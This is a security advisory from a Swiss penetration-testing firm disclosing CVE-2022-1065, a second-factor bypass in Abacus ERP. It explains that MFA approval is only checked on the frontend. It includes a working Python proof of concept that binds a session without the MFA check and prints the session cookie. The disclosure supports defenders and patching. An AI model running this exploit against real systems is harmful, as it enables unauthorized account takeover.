Apr 15, 2022 von Roman Gribi
During our penetration testing projects, we discover common relevant vulnerabilities. Read here how we published this vulnerability as a CVE in cooperation with the manufacturer.
Abacus is an owner-managed Swiss software company that employs around 600 people. For over three decades it has developed successful business software [1].
This advisory describes a vulnerability affecting various versions of the Abacus ERP software. The vulnerability relies within the authentication process of Abacus and allows to bypass the second factor. Therefore, it is possible to gain access to the system with the knowledge of a valid username / password combination only and weakening the overall security level [2].
The attack has been successfully tested against the following version:
According to vendor information, the following versions are vulnerable as well:
According to vendor information, the following versions are not vulnerable:
The application supports multi factor authentication (MFA) to further strengthen the authentication process. After a user enters valid credentials, a request is sent to the registered Abacus Access app on the mobile device of the user. The user then has to approve the login request before a redirect to the system is performed. However, the verification request which the user has accepted on the mobile phone is only validated on the frontend and not the backend. Due to that, this step can be bypassed by just ignoring the validation.
The following steps are passed during the authentication process: 1. The user accesses the page ‘/portal/myabacus’ 2. The server creates a new session cookie and automatically redirects the user to ‘/oauth/oauth2/v1/auth’ 3. The user enters valid credentials, which are sent to ‘/oauth/oauth2/v1/authenticate’ 4. If the credentials are valid, the backend system triggers the MFA request to the mobile application 5. Until the user has accepted the MFA request on the mobile, the frontend part of the application sends a regular status requests to the backend system to check if the user has already confirmed the request 6. Once the MFA request has been confirmed and the backend sends a successful response in the status request, the authenticated session is bound using a request to ‘/oauth-/oauth2/v1/authenticate/ocra/auth-session-bindings’
However, in the vulnerable versions, step 5 is only validated on the frontend and not on the backend. As such, an attacker can just bypass/omit the status request and directly initiate the session binding from step 6 without further verification of the MFA status on the backend.
Using this approach, it is possible to initiate a fully authenticated session by only providing username / password without the need to enter a second authentication factor.
The following proof of concept generates the necessary requests to generate a valid session id.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import re
import json
import urllib
from urllib.request import HTTPCookieProcessor, Request, build_opener
cookie_processor = HTTPCookieProcessor()
opener = build_opener(cookie_processor)
# Step 1,2 - Generate Session ID
opener.open(Request(BASE_URL + "/portal/myabacus"))
# Step 3 - Perform login and extract values
data = urllib.parse.urlencode(
{'username':USERNAME,'password':PASSWORD}).encode()
req = Request(BASE_URL + "/oauth/oauth2/v1/authenticate", data=data)
res = opener.open(req)
raw = str(res.read())
data_auth = re.search('(?<=data-access-token=")[^"]+', raw).group(0)
data_sid = re.search('(?<=data-auth-session-id=")[^"]+', raw).group(0)
data_rid = re.search('(?<=data-approval-request-id=")[^"]+', raw).group(0)
# Step 6 - Bind auth session to session id without requesting MFA status
data = json.dumps(
{'authenticationSessionId':data_sid,'approvalRequestId':data_rid}
).encode('utf-8')
req = Request(BASE_URL +
"/oauth/oauth2/v1/authenticate/ocra/auth-session-bindings")
req.add_header('Authorization', 'Bearer ' + data_auth)
req.add_header('Content-Type', 'application/json; charset=utf-8')
req.add_header('Content-Length', len(data))
opener.open(req,data=data)
# Do manual redirect in case there is no auto redirect
# This step could be omitted depending on the system configuration
data_code = re.search('(?<=code" value=")[^"]+', raw).group(0)
data_sstate = re.search('(?<=session_state" value=")[^"]+', raw).group(0)
data_state = re.search('(?<="state" value=")[^"]+', raw).group(0)
data = urllib.parse.urlencode(
{'code':data_code,'session_state':data_sstate,'state':data_state}).encode()
req = Request(BASE_URL + "/portal/myabacus/oauthcb",data=data)
opener.open(req)
# Extract cookie
print("__Secure-MYABACUS_SESSION: " +
cookie_processor.cookiejar
._cookies[DOMAIN]['/portal/myabacus']['__Secure-MYABACUS_SESSION'].value)
Install the available hot fixes and / or service packs from 2022-01-15 or newer [3].
Redguard is a Swiss-based information security company. We assist our clients with technical security testing as well as organizational security audits and consulting. This enables us to have a team with extensive experience in a wide variety of security relevant topics.
www.redguard.ch
contact@redguard.ch
This document is not meant to be a complete list of security issues for any of the mentioned software and/or versions. It is possible and indeed likely that there are further security issues that are yet to be identified. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties regarding this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
References
[1] https://www.abacus.ch/unternehmen/portrait
[2] https://owasp.org/www-project-top-ten/2017/A22017-BrokenAuthentication
[3] https://classic.abacus.ch/downloads-page/servicepacks
[4] https://www.cve.org/CVERecord?id=CVE-2022-1065